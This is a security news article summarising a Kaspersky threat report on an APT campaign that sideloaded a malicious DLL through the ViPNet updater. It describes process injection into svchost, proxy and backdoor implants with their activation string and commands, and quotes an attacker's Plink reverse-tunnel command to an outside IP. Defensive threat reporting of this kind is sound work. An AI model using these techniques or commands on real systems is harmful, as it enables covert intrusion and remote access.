Skip to main content
Emerging ThreatsMalware & Ransomware

ViPNet Update System Exploited in HelloNet APT Campaign

A laptop screen displays a software update, with a subtle shadow of a hand in the background, symbolizing exploitation.

The implants used during this campaign “were launched through the ViPNet update system,” Kaspersky reported, a finding the company says began in May 2026 and remained active at publication. The attack chain centers on compromise through the ViPNet Update System and delivers multiple in-memory and on-disk modules that together enable reconnaissance, proxying, file transfer and log cleanup.

Persistence through the ViPNet update component

Kaspersky identified a malicious library named wtsapi32.dll placed in C:\Program Files (x86)\InfoTeCS\VIPNet Update System. The file exploits DLL sideloading against the ViPNet updater executable itcsrvup64.exe, which runs at OS startup. The loader inside the malicious DLL — named HelloInjector — injects into a svchost process (searching for a process whose name contains "svchost" and whose command line contains "netsvcs") using NtWriteVirtualMemory and NtCreateThreadEx, then loads a plaintext payload in memory. Kaspersky flags this use of a trusted update component to achieve persistence as a primary operational objective of the attackers.

Modular implants: HelloInjector, HelloProxy, HelloExecutor, HelloCleaner, HelloBackdoor

The campaign uses a layered toolset. HelloInjector is the initial loader. The injected payload discovered by researchers, HelloProxy, is both a hidden proxy and a secondary loader. HelloProxy hooks NtDeviceIoControlFile, closesocket and shutdown via Microsoft Detours and intercepts two IOCTL codes — AFD_RECV (0x12017) and AFD_GET_TDI_HANDLES (0x12037) — to register sockets and process incoming network traffic. Every AFD_RECV-triggering message is logged locally to C:\users\public\tesh4RPC.txt in the format threadid: <Thread ID> pid=<PID>.

From HelloProxy the attackers either proxy traffic (accepting strings in <ip_addr>:<port> format and forwarding between sockets) or accept an executable from the command server and load it into memory. Kaspersky identified two payloads injected into svchost: HelloExecutor, used to run reconnaissance commands (examples include query user, ipconfig /all, ping 8.8.8.8 -n 1 and multiple dir queries targeting Infotecs/ViPNet directories), and HelloCleaner, a module that removes or alters ViPNet logs to hide attacker activity.

On at least one compromised host researchers found a Rust-based backdoor named HelloBackdoor. It listens on port 443 and activates when it receives the string 47c6235b4d2611184 (the second half of the MD5 hash of " hello\n "). HelloBackdoor accepts commands including !upload, !down and !stop; non-matching input is executed through cmd.exe. The backdoor’s cleanup sequence includes a BAT that deletes the backdoor binary and restarts a service named iplircontrol.

Network tradecraft, tunnels and observable infrastructure

The implants implement a two-byte handshake (0x0502) and expect a server reply containing ASDFASFSAFASDF to identify command-and-control traffic. HelloProxy listens on ports 5003 and 5060 for initial commands. Kaspersky also documented explicit tunnel creation using a renamed Plink/PuTTY binary run from C:\users\public\music. An observed command line was frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw [redacted]. Researchers connected tunneling activity to two IPs: 5.39.253[.]206 and 176.32.34[.]135.

Kaspersky recovered multiple indicators: HelloBackdoor sample hashes (for example 16C211C96735F2FAE9361B89BD7A31BF), droppers and renamed ViPNet client binaries, and utilities used to alter Windows Defender exclusions. The report lists detected TTPs with corresponding command examples (T1569.002, T1016, T1049, T1082, T1057 and others) and documents proxy/SSH tunneling (T1090 / T1021.004) observed in command lines.

Detection, telemetry and the vendor response

Kaspersky notes multiple detection paths and updated rules. The company’s KEDR Expert flags include using_plink_or_putty_for_port_forwarding and vipnet_load_library_code_injection. Kaspersky Anti Targeted Attack (KATA) with the NDR module implements a Suricata rule that matches HelloBackdoor’s first expected packet on TCP/443 (the 47c6… activation string). Kaspersky Managed Detection and Response monitors the creation of wtsapi32.dll in the ViPNet Update System path, unusual launches by itcsrvup64.exe/itcsrvup.exe, atypical svchost behavior, creation of executables in writable default locations (e.g., C:\Users\Public\music) and the use of plink/ssh tunnel command-line patterns (port:address:port). The report lists verdicts used by Kaspersky solutions such as Trojan.Win32.Agentb.ttoe and HEUR:Trojan.Win64.DllHijacking.gen.

What this means for Russian government, energy, transport, education and logistics organizations; InfoTeCS/ViPNet; security teams

  • Russian organizations in government, energy, transport, education and logistics: hosts using ViPNet software should treat the ViPNet update component as an elevated risk vector, monitor traffic on ports 5003, 5060 and 443 for the documented handshakes, and audit writable public folders such as C:\Users\Public for unexpected executables and plink/ssh tunnel activity.
  • InfoTeCS / ViPNet administrators: the ViPNet Update System location (C:\Program Files (x86)\InfoTeCS\VIPNet Update System) was abused for DLL sideloading; administrators should monitor creation of DLLs in that directory and any launches of itcsrvup64.exe that create or load unsigned libraries.
  • Security teams and EDR operators: monitor for process injection into svchost originating from ViPNet updater processes, flag renamed Plink/PuTTY binaries by PE signatures rather than filename, and deploy IDS/Suricata signatures (the KATA/NDR rule detects HelloBackdoor activation) alongside file and process-based detections.

Kaspersky links the campaign with low confidence to an unknown Chinese-speaking APT group, noting strings referencing sina.com and the USTC Rust mirror but warning these may be false flags. The report concludes by emphasizing layered detection — network, EDR and managed response — as required to detect and disrupt attackers who exploit trusted update components like ViPNet’s updater.

https://securelist.com/tr/hellonet-vipnet/120700/